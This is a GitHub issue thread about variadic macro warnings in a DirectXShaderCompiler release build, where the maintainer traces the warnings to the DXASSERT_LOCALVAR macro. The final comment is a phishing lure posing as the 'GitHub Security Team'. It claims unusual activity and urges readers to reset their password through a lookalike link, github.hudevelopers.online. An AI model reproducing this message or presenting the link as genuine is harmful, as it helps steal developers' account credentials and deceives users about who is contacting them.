### ISSUE TITLE
Variadic macro warnings.

### ISSUE THREAD

**Issue by pow2clk** [pow2clk/DirectXShaderCompiler#8]
https://travis-ci.org/google/DirectXShaderCompiler/jobs/394374778 shows that apple is spitting out variadic macro warnings for some reason. Linux no longer does this.

**Comment by pow2clk** [comment]
Not an apple thing after all. A release build thing. The release version of DXASSERT_LOCALVAR takes variadic arguments even though it shouldn't.

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
